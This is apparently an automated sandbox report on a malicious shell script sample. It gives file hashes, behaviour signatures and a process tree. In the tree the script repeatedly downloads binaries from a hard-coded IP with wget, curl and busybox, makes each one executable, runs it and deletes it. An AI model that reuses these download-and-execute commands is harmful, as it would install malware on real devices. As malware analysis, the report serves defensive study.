Analysis
max time kernel
70s
max time network
113s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags
arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted
18/10/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-mipsel-20240611-en
General
Target
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Size
10KB
MD5
3aaf11d0f07a6e2ac3ecd444e17b7264
SHA1
20aa3c7e07680e3c4c69d8f73bb7b0c6907720dd
SHA256
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea
SHA512
d017e3552474bf26ac8e1ee45c9b4122fa7943f4d4e234071da4a28d2a874653c9d1461ffc5152af8c0d3e923f8074ed0f8b165d934f68c4eb7df0dd2e45a65e
SSDEEP
192:VLV2KcsxV/G+N6GA5uKgqcl2KcixVTG+N6GQM:NV2Kcz5uKgqM2Kc3M
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Reads runtime system information
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
PID  image  command line  [signatures]  (indentation shows process depth)
PID 671  /tmp/e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh  /tmp/e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
  PID 674  /bin/rm  /bin/rm bins.sh
  PID 678  /usr/bin/wget  wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t
  PID 686  /usr/bin/curl  curl -O http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 694  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t
  PID 697  /bin/chmod  chmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t  [File and Directory Permissions Modification]
  PID 698  /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t  ./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t  [Executes dropped EXE]
  PID 699  /bin/rm  rm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t
  PID 701  /usr/bin/wget  wget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu
  PID 705  /usr/bin/curl  curl -O http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 709  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu
  PID 710  /bin/chmod  chmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu  [File and Directory Permissions Modification]
  PID 711  /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu  ./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu  [Executes dropped EXE]
  PID 712  /bin/rm  rm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu
  PID 713  /usr/bin/wget  wget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe
  PID 714  /usr/bin/curl  curl -O http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 715  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe
  PID 722  /bin/chmod  chmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe  [File and Directory Permissions Modification]
  PID 723  /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe  ./aht8qi13vR83cufA19JeM2QdZqklsVQxUe  [Executes dropped EXE]
  PID 724  /bin/rm  rm aht8qi13vR83cufA19JeM2QdZqklsVQxUe
  PID 725  /usr/bin/wget  wget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1
  PID 729  /usr/bin/curl  curl -O http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 733  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1
  PID 736  /bin/chmod  chmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1  [File and Directory Permissions Modification]
  PID 737  /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1  ./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1  [Executes dropped EXE]
  PID 738  /bin/rm  rm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1
  PID 739  /usr/bin/wget  wget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs
  PID 744  /usr/bin/curl  curl -O http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 747  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs
  PID 750  /bin/chmod  chmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs  [File and Directory Permissions Modification]
  PID 751  /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs  ./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs  [Executes dropped EXE]
  PID 752  /bin/rm  rm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs
  PID 754  /usr/bin/wget  wget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz
  PID 757  /usr/bin/curl  curl -O http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 761  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz
  PID 765  /bin/chmod  chmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz  [File and Directory Permissions Modification]
  PID 766  /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz  ./93SohCRyB65qsR9PHr0olpVOMBCDET7daz  [Executes dropped EXE]
  PID 768  /bin/rm  rm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz
  PID 769  /usr/bin/wget  wget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm
  PID 776  /usr/bin/curl  curl -O http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 782  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm
  PID 785  /bin/chmod  chmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm  [File and Directory Permissions Modification]
  PID 786  /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm  ./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm  [Executes dropped EXE]
  PID 787  /bin/rm  rm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm
  PID 789  /usr/bin/wget  wget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg
  PID 791  /usr/bin/curl  curl -O http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 792  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg
  PID 793  /bin/chmod  chmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg  [File and Directory Permissions Modification]
  PID 794  /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg  ./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg  [Executes dropped EXE]
  PID 795  /bin/rm  rm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg
  PID 796  /usr/bin/wget  wget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO
  PID 797  /usr/bin/curl  curl -O http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 798  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO
  PID 801  /bin/chmod  chmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO  [File and Directory Permissions Modification]
  PID 802  /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO  ./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO  [Executes dropped EXE]
  PID 803  /bin/rm  rm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO
  PID 804  /usr/bin/wget  wget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9
  PID 808  /usr/bin/curl  curl -O http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 812  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9
  PID 818  /bin/chmod  chmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9  [File and Directory Permissions Modification]
  PID 819  /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9  ./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9  [Executes dropped EXE]
  PID 820  /bin/rm  rm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9
  PID 821  /usr/bin/wget  wget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA
  PID 825  /usr/bin/curl  curl -O http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 829  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA
  PID 832  /bin/chmod  chmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA  [File and Directory Permissions Modification]
  PID 833  /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA  ./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA  [Executes dropped EXE]
  PID 834  /bin/rm  rm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA
  PID 835  /usr/bin/wget  wget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug
  PID 839  /usr/bin/curl  curl -O http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 843  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug
  PID 846  /bin/chmod  chmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug  [File and Directory Permissions Modification]
  PID 847  /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug  ./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug  [Executes dropped EXE]
  PID 848  /bin/rm  rm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug
  PID 849  /usr/bin/wget  wget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3
  PID 853  /usr/bin/curl  curl -O http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 857  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3
  PID 858  /bin/chmod  chmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3  [File and Directory Permissions Modification]
  PID 859  /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3  ./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3  [Executes dropped EXE]
  PID 860  /bin/rm  rm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3
  PID 861  /usr/bin/wget  wget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P
  PID 862  /usr/bin/curl  curl -O http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 863  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P
  PID 864  /bin/chmod  chmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P  [File and Directory Permissions Modification]
  PID 865  /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P  ./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P  [Executes dropped EXE]
  PID 866  /bin/rm  rm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P
  PID 867  /usr/bin/wget  wget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9
  PID 868  /usr/bin/curl  curl -O http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 869  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9
  PID 870  /bin/chmod  chmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9  [File and Directory Permissions Modification]
  PID 871  /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9  ./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9  [Executes dropped EXE]
  PID 872  /bin/rm  rm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9
  PID 873  /usr/bin/wget  wget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA
  PID 874  /usr/bin/curl  curl -O http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 875  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA
  PID 876  /bin/chmod  chmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA  [File and Directory Permissions Modification]
  PID 877  /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA  ./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA  [Executes dropped EXE]
  PID 878  /bin/rm  rm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA
  PID 879  /usr/bin/wget  wget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug
  PID 880  /usr/bin/curl  curl -O http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 881  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug
  PID 882  /bin/chmod  chmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug  [File and Directory Permissions Modification]
  PID 883  /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug  ./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug  [Executes dropped EXE]
  PID 884  /bin/rm  rm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug
  PID 885  /usr/bin/wget  wget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3
  PID 888  /usr/bin/curl  curl -O http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 889  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3
  PID 890  /bin/chmod  chmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3  [File and Directory Permissions Modification]
  PID 891  /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3  ./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3  [Executes dropped EXE]
  PID 892  /bin/rm  rm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3
  PID 893  /usr/bin/wget  wget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P
  PID 894  /usr/bin/curl  curl -O http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 895  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P
  PID 896  /bin/chmod  chmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P  [File and Directory Permissions Modification]
  PID 897  /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P  ./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P  [Executes dropped EXE]
  PID 898  /bin/rm  rm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P
  PID 899  /usr/bin/wget  wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t
  PID 900  /usr/bin/curl  curl -O http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 901  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t
  PID 902  /bin/chmod  chmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t  [File and Directory Permissions Modification]
  PID 903  /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t  ./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t  [Executes dropped EXE]
  PID 904  /bin/rm  rm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t
  PID 905  /usr/bin/wget  wget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu
  PID 906  /usr/bin/curl  curl -O http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 907  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu
  PID 908  /bin/chmod  chmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu  [File and Directory Permissions Modification]
  PID 909  /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu  ./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu  [Executes dropped EXE]
  PID 910  /bin/rm  rm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu
  PID 911  /usr/bin/wget  wget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe
  PID 912  /usr/bin/curl  curl -O http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 913  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe
  PID 914  /bin/chmod  chmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe  [File and Directory Permissions Modification]
  PID 915  /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe  ./aht8qi13vR83cufA19JeM2QdZqklsVQxUe  [Executes dropped EXE]
  PID 916  /bin/rm  rm aht8qi13vR83cufA19JeM2QdZqklsVQxUe
  PID 917  /usr/bin/wget  wget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1
  PID 919  /usr/bin/curl  curl -O http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 921  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1
  PID 922  /bin/chmod  chmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1  [File and Directory Permissions Modification]
  PID 923  /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1  ./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1  [Executes dropped EXE]
  PID 924  /bin/rm  rm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1
  PID 925  /usr/bin/wget  wget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs
  PID 926  /usr/bin/curl  curl -O http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 927  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs
  PID 928  /bin/chmod  chmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs  [File and Directory Permissions Modification]
  PID 929  /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs  ./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs  [Executes dropped EXE]
  PID 930  /bin/rm  rm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs
  PID 931  /usr/bin/wget  wget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz
  PID 932  /usr/bin/curl  curl -O http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 933  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz
  PID 934  /bin/chmod  chmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz  [File and Directory Permissions Modification]
  PID 935  /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz  ./93SohCRyB65qsR9PHr0olpVOMBCDET7daz  [Executes dropped EXE]
  PID 936  /bin/rm  rm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz
  PID 937  /usr/bin/wget  wget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm
  PID 938  /usr/bin/curl  curl -O http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 939  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm
  PID 940  /bin/chmod  chmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm  [File and Directory Permissions Modification]
  PID 941  /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm  ./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm  [Executes dropped EXE]
  PID 942  /bin/rm  rm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm
  PID 943  /usr/bin/wget  wget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg
  PID 944  /usr/bin/curl  curl -O http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 945  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg
  PID 947  /bin/chmod  chmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg  [File and Directory Permissions Modification]
  PID 949  /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg  ./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg  [Executes dropped EXE]
  PID 950  /bin/rm  rm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg
  PID 951  /usr/bin/wget  wget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO
  PID 952  /usr/bin/curl  curl -O http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 953  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO
  PID 954  /bin/chmod  chmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO  [File and Directory Permissions Modification]
  PID 955  /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO  ./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO  [Executes dropped EXE]
  PID 956  /bin/rm  rm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97